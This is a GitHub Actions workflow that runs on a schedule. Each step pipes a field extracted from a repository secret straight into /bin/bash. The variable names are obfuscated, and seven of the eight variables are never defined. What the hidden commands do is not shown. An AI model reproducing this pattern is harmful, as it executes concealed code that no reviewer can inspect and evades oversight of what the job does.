name: chufengkou
on:
  workflow_dispatch:
  schedule:
    - cron: '4 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chufengkou
        env:
          tlvwi43226: ${{ secrets.tlvwi43226 }}
        run: |
          echo $tlvwi43226 | jq -r .eus56 | /bin/bash
          echo $pjea5 | jq -r .bdnuk99179 | /bin/bash
          echo $eyoq22853 | jq -r .htw0 | /bin/bash
          echo $opfwg58 | jq -r .vo68689 | /bin/bash
          echo $oehxd09 | jq -r .sarz96394 | /bin/bash
          echo $zg8 | jq -r .tp66099 | /bin/bash
          echo $qu927 | jq -r .p60355 | /bin/bash
          echo $wd88 | jq -r .f7250 | /bin/bash

